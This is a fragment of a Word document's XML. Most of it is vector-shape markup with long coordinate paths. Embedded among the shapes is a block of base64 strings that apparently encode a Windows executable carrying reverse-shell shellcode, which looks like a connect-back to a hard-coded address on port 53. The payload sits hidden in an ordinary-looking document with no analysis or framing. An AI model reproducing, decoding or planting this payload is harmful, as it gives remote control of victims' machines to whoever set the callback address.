,9621,3041,9622,3041,9622,3041,9623,3041,9624,3041,9624,3041,9625,3041,9626,3041,9627,3041,9628,3041,9629,3041,9630,3041,9631,3041,9632,3041,9633,3041,9634,3041,9635,3041,9636,3041,9638,3041,9639,3041,9640,3041,9642,3041,9643,3041,9645,3041,9647,3041,9648,3041,9650,3041,9652,3041,9654,3041,9655,3041,9657,3041,9659,3041,9661,3041,9664,3041,9666,3041,9668,3041,9670,3041,9673,3041,9675,3041,9678,3041,9680,3041,9683,3041,9686,3041,9688,3041,9691,3041,9694,3041,9697,3041,9700,3041,9704,3041,9707,3041,9710,3041,9714,3041,9717,3041,9721,3041,9724,3041,9728,3041,9732,3041,9736,3041,9740,3041,9744,3041,9748,3041,9752,3041,9756,3041,9761,3041,9765,3041,9770,3041,9775,3041,9779,3041,9784,3041,9789,3041,9794,3041,9799,3041,9805,3041,9810,3041,9815,3041,9821,3041,9827,3041,9832,3041,9838,3041,9844,3041,9850,3041,9856,3041,9863,3041,9869,3041,9869,3041,9869,3041,9869,3041,9869,3041,9869,3041,9869,3041,9869,3041,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3040,9869,3039,9869,3039,9869,3039,9869,3039,9869,3039,9869,3039,9869,3038,9869,3038,9869,3038,9869,3038,9869,3037,9869,3037,9869,3037,9869,3037,9869,3036,9869,3036,9869,3036,9869,3035,9869,3035,9869,3034,9869,3034,9869,3034,9869,3033,9869,3033,9869,3032,9869,3032,9869,3031,9869,3031,9869,3030,9869,3029,9869,3029,9869,3028,9869,3027,9869,3027,9869,3026,9869,3025,9869,3024,9869,3024,9869,3023,9869,3022,9869,3021,9869,3020,9869,3019,9869,3018,9869,3017,9869,3016,9869,3015,9869,3014,9869,3013,9869,3012,9869,3010,9869,3009,9869,3008,9869,3007,9869,3005,9869,3004,9869,3003,9869,3001,9869,3000,9869,2998,9869,2997,9869,2995,9869,2994,9869,2992,9869,2990,9869,2989,9869,2987,9869,2985,9869,2983,9869,2981,9869,2979,9869,2977,9869,2976,9869,2973,9869,2971,9869,2969,9869,2967,9869,2965,9869,2963,9869,2960,9869,2958,9869,2956,9869,2953,9869,2951,9869,2948,9869,2946,9869,2943,9869,2940,9869,2938,9869,2935,9869,2932,9869,2929,9869,2926,9869,2923,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9868,2920,9868,2920,9868,2920,9868,2920,9868,2920,9868,2920,9868,2920,9867,2920,9867,2920,9867,2920,9867,2920,9866,2920,9866,2920,9866,2920,9865,2920,9865,2920,9864,2920,9864,2920,9864,2920,9863,2920,9862,2920,9862,2920,9861,2920,9861,2920,9860,2920,9859,2920,9859,2920,9858,2920,9857,2920,9856,2920,9855,2920,9854,2920,9853,2920,9852,2920,9851,2920,9850,2920,9849,2920,9848,2920,9846,2920,9845,2920,9844,2920,9842,2920,9841,2920,9839,2920,9838,2920,9836,2920,9835,2920,9833,2920,9831,2920,9829,2920,9827,2920,9825,2920,9823,2920,9821,2920,9819,2920,9817,2920,9815,2920,9812,2920,9810,2920,9808,2920,9805,2920,9803,2920,9800,2920,9797,2920,9794,2920,9791,2920,9789,2920,9785,2920,9782,2920,9779,2920,9776,2920,9773,2920,9769,2920,9766,2920,9762,2920,9759,2920,9755,2920,9751,2920,9747,2920,9743,2920,9739,2920,9735,2920,9731,2920,9726,2920,9722,2920,9718,2920,9713,2920,9708,2920,9704,2920,9699,2920,9694,2920,9689,2920,9684,2920,9678,2920,9673,2920,9667,2920,9662,2920,9656,2920,9651,2920,9645,2920,9639,2920,9633,2920,9626,2920,9620,292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90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5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3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19,2800,11623,2800,11627,2800,11630,2800,11634,2800,11638,2800,11642,2800,11646,2800,11650,2800,11654,2800,11658,2800,11662,2800,11667,2800,11671,2800,11676,2800,11680,2800,11685,2800,11690,2800,11695,2800,11700,2800,11705,2800,11711,2800,11716,2800,11721,2800,11727,2800,11733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2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3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1,2800,13493,2800,13495,2800,13497,2800,13500,2800,13502,2800,13505,2800,13507,2800,13510,2800,13513,2800,13515,2800,13518,2800,13521,2800,13524,2800,13527,2800,13531,2800,13534,2800,13537,2800,13540,2800,13544,2800,13548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4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5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3.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14050;width:130;height:270" coordorigin="2670,14050" coordsize="130,270" path="m2680,14071l2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2683,14071,2683,14071,2683,14071,2683,14071,2684,14071,2684,14071,2684,14071,2685,14071,2685,14071,2685,14071,2686,14071,2686,14071,2686,14071,2687,14071,2687,14071,2688,14071,2688,14071,2689,14071,2689,14071,2690,14071,2690,14071,2691,14071,2692,14071,2692,14071,2693,14071,2694,14071,2694,14071,2695,14071,2696,14071,2697,14071,2697,14071,2698,14071,2699,14071,2700,14071,2701,14071,2702,14071,2703,14071,2704,14071,2705,14071,2706,14071,2707,14071,2708,14071,2709,14071,2710,14071,2712,14071,2713,14071,2714,14071,2715,14071,2717,14071,2718,14071,2720,14071,2721,14071,2723,14071,2724,14071,2726,14071,2727,14071,2729,14071,2731,14071,2732,14071,2734,14071,2736,14071,2738,14071,2740,14071,2741,14071,2743,14071,2745,14071,2747,14071,2749,14071,2752,14071,2754,14071,2756,14071,2758,14071,2760,14071,2763,14071,2765,14071,2768,14071,2770,14071,2773,14071,2775,14071,2778,14071,2780,14071,2783,14071,2786,14071,2789,14071,2792,14071,2794,14071,2797,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14073,2800,14073,2800,14073,2800,14073,2800,14074,2800,14074,2800,14074,2800,14075,2800,14075,2800,14076,2800,14076,2800,14077,2800,14077,2800,14078,2800,14078,2800,14079,2800,14079,2800,14080,2800,14081,2800,14082,2800,14082,2800,14083,2800,14084,2800,14085,2800,14086,2800,14087,2800,14088,2800,14089,2800,14090,2800,14091,2800,14092,2800,14094,2800,14095,2800,14096,2800,14098,2800,14099,2800,14101,2800,14102,2800,14104,2800,14105,2800,14107,2800,14109,2800,14111,2800,14113,2800,14115,2800,14117,2800,14119,2800,14121,2800,14123,2800,14125,2800,14128,2800,14130,2800,14132,2800,14135,2800,14138,2800,14140,2800,14143,2800,14146,2800,14149,2800,14152,2800,14155,2800,14158,2800,14161,2800,14164,2800,14167,2800,14171,2800,14174,2800,14178,2800,14181,2800,14185,2800,14189,2800,14193,2800,14197,2800,14201,2800,14205,2800,14209,2800,14214,2800,14218,2800,14222,2800,14227,2800,14232,2800,14237,2800,14241,2800,14246,2800,14251,2800,14257,2800,14262,2800,14267,2800,14273,2800,14278,2800,14284,2800,14290,2800,14295,2800,14301,2800,14307,2800,14314,2800,14320,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2798,14326,2798,14326,2798,14326,2798,14326,2798,14326,2797,14326,2797,14326,2797,14326,2797,14326,2796,14326,2796,14326,2795,14326,2795,14326,2795,14326,2794,14326,2794,14326,2793,14326,2793,14326,2793,14326,2792,14326,2792,14326,2791,14326,2790,14326,2790,14326,2789,14326,2789,14326,2788,14326,2787,14326,2787,14326,2786,14326,2785,14326,2784,14326,2783,14326,2783,14326,2782,14326,2781,14326,2780,14326,2779,14326,2778,14326,2777,14326,2776,14326,2775,14326,2774,14326,2773,14326,2772,14326,2770,14326,2769,14326,2768,14326,2767,14326,2765,14326,2764,14326,2763,14326,2761,14326,2760,14326,2758,14326,2757,14326,2755,14326,2753,14326,2752,14326,2750,14326,2748,14326,2747,14326,2745,14326,2743,14326,2741,14326,2739,14326,2737,14326,2735,14326,2733,14326,2731,14326,2729,14326,2727,14326,2725,14326,2723,14326,2720,14326,2718,14326,2716,14326,2713,14326,2711,14326,2708,14326,2706,14326,2703,14326,2700,14326,2698,14326,2695,14326,2692,14326,2689,14326,2686,14326,2683,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14324,2680,14324,2680,14324,2680,14324,2680,14323,2680,14323,2680,14323,2680,14322,2680,14322,2680,14321,2680,14321,2680,14320,2680,14320,2680,14319,2680,14319,2680,14318,2680,14317,2680,14317,2680,14316,2680,14315,2680,14314,2680,14313,2680,14312,2680,14311,2680,14310,2680,14309,2680,14308,2680,14307,2680,14306,2680,14305,2680,14304,2680,14302,2680,14301,2680,14300,2680,14298,2680,14297,2680,14295,2680,14294,2680,14292,2680,14290,2680,14288,2680,14287,2680,14285,2680,14283,2680,14281,2680,14279,2680,14276,2680,14274,2680,14272,2680,14270,2680,14267,2680,14265,2680,14262,2680,14260,2680,14257,2680,14254,2680,14252,2680,14249,2680,14246,2680,14243,2680,14240,2680,14236,2680,14233,2680,14230,2680,14227,2680,14223,2680,14219,2680,14216,2680,14212,2680,14208,2680,14204,2680,14200,2680,14196,2680,14192,2680,14188,2680,14184,2680,14179,2680,14175,2680,14170,2680,14166,2680,14161,2680,14156,2680,14151,2680,14146,2680,14141,2680,14136,2680,14130,2680,14125,2680,14119,2680,14114,2680,14108,2680,14102,2680,14096,2680,14090,2680,14084,2680,14077,2680,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14690;width:130;height:270" coordorigin="2670,14690" coordsize="130,270" path="m2680,14716l2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2683,14716,2683,14716,2683,14716,2683,14716,2684,14716,2684,14716,2684,14716,2685,14716,2685,14716,2685,14716,2686,14716,2686,14716,2686,14716,2687,14716,2687,14716,2688,14716,2688,14716,2689,14716,2689,14716,2690,14716,2690,14716,2691,14716,2692,14716,2692,14716,2693,14716,2694,14716,2694,14716,2695,14716,2696,14716,2697,14716,2697,14716,2698,14716,2699,14716,2700,14716,2701,14716,2702,14716,2703,14716,2704,14716,2705,14716,2706,14716,2707,14716,2708,14716,2709,14716,2710,14716,2712,14716,2713,14716,2714,14716,2715,14716,2717,14716,2718,14716,2720,14716,2721,14716,2723,14716,2724,14716,2726,14716,2727,14716,2729,14716,2731,14716,2732,14716,2734,14716,2736,14716,2738,14716,2740,14716,2741,14716,2743,14716,2745,14716,2747,14716,2749,14716,2752,14716,2754,14716,2756,14716,2758,14716,2760,14716,2763,14716,2765,14716,2768,14716,2770,14716,2773,14716,2775,14716,2778,14716,2780,14716,2783,14716,2786,14716,2789,14716,2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14721,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14748,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14831,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14960,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14944,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,268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49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"AAAA4AACIQsBCwAADAAAAAYAAAAAAAAOKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAA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"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAA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AAAwCkA"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"AEsAAAAAQAAA0AIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAA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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAA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"AAAALnRleHQAAAAUCgAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA0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AIAAABA"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"AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAA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"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPApAAAAAAAASAAAAAIABQBEIgAAfAcAAAMAA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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgIoB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AAACgAA"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"KAIAAAYAACoAAAAAAAAA/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsI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MHPDQHH"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"4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7f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SR15FiL"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59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"WCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMd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yYHiej/"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"0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXa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JmldGH/"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"1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1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ZNTagBW"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57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"U1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+m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b////AcMp"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"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAwAABCgGAAAKC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hYGjml+"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"AQAABH4CAAAEKAMAAAYLBhYHbigHAAAKBo5pKAgAAAoAfgkAAAoMFg1+CQAAChMEFhYHE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QQWEgMo"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"BAAABgwIFSgFAAAGJisAKkogABAAAIABAAAEH0CAAgAABCpCU0pCAQABAAAAAAAMAAAAd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jQuMC4z"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"MDMxOQAAAAAFAGwAAABgAgAAI34AAMwCAABkAwAAI1N0cmluZ3MAAAAAMAYAAAgAAAAjV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VMAOAYA"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"ABAAAAAjR1VJRAAAAEgGAAA0AQAAI0Jsb2IAAAAAAAAAAgAAAVfVAjQJAgAAAPolMwAWA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AABAAAA"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"DwAAAAQAAAADAAAABgAAAAwAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAA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AEAAAAB"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69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"AAAAAQAAAAAACgABAAAAAAAGAEsARAAGAFsBPwEGAHcBPwEGAKYBhgEGAMYBhgEGAPcBR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AAGAEEC"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"hgEGAFwCRAAGAJgChgEGAKcCRAAGAK0CRAAGANACRAAGAAID4wIGABQD4wIGAEcDNwMAA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AAAAQAA"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"AAAAAQABAAEAEAAhACkABQABAAEAAAAAAPwBAAAFAAMABwATAQAAZgIAACEABAAHABEAX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QASABEA"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9.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000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1000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1000l1517,1000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5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5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3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6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3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3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20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2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4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400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80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4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6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80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8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4000,10484,14008,10484,14017,10484,14026,10484,14035,10484,14045,10484,14054,10484,14064,10484,14074,10484,14084,10484,14095,10484,14105,10484,14116,10484,14128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6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8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4000,1517,14008,1517,14017,1517,14026,1517,14035,1517,14045,1517,14054,1517,14064,1517,14074,1517,14084,1517,14095,1517,14105,1517,14116,1517,14128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3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5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8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8,1510,15656,1510,15654,1510,15652,1510,15651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5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8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7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9,2800,1340,2800,1341,2800,1343,2800,1344,2800,1346,2800,1347,2800,1349,2800,1351,2800,1353,2800,1354,2800,1356,2800,1358,2800,1360,2800,1362,2800,1364,2800,1367,2800,1369,2800,1371,2800,1374,2800,1376,2800,1379,2800,1381,2800,1384,2800,1387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9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8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4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1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7,2680,2825,2680,2824,2680,2823,2680,2822,2680,2820,2680,2819,2680,2817,2680,2816,2680,2814,2680,2813,2680,2811,2680,2809,2680,2808,2680,2806,2680,2804,2680,2802,2680,2800,2680,2798,2680,2796,2680,2794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300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1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5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3.500pt;margin-top:224.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,4490" coordsize="130,270">
